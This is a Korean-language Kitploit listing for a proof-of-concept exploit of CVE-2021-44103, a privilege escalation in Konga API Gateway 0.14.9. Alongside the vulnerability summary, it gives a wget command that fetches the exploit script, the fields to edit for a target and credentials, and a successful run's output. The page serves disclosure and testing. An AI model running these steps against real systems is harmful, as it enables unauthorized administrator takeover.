Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44103 — CVE-2021-44103에 대한 개념 증명 익스플로잇으로, Konga API Gateway 0.14.9에서 수직적 권한 상승을 보여주며, 인증된 사용자가 관리자 접근 권한을 얻을 수 있도록 합니다. | Kitploit
도구/GitHubGitHub/paulotrindadec/cve-2021-44103
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAPI Security
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

CVE-2021-44103에 대한 개념 증명 익스플로잇으로, Konga API Gateway 0.14.9에서 수직적 권한 상승을 보여주며, 인증된 사용자가 관리자 접근 권한을 얻을 수 있도록 합니다.

저장소 보기
353년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-44103

KONGA 0.14.9에 대한 개념 증명 - 권한 상승.

소개

2021년 11월 16일, Fabrício Salomão와 저는 Konga API 게이트웨이에서 인증된 모든 사용자가 관리자가 될 수 있는 취약점을 발견했습니다.

취약점 보고

제품: KONGA
모델: 0.14.9
취약점: 권한 상승
영향: 전체 관리자 액세스 (수직적 권한 상승)
인증: 필요
익스플로잇 저자: Fabricio Salomao / Paulo Trindade

PoC

아래에는 권한이 없는 "usernormal"이라는 일반 사용자가 생성되었습니다.

Crash

Crash

아래의 요청을 통해 'admin' 매개변수의 플래그 'FALSE'가 'TRUE'로 변경되었습니다.

Crash

따라서 저희를 위한 익스플로잇이 생성되었습니다: https://www.exploit-db.com/exploits/50521

Crash

익스플로잇을 실행한 후 권한 상승이 성공했습니다!

결과:

Crash

익스플로잇 실행

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

링크

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

도구 다운로드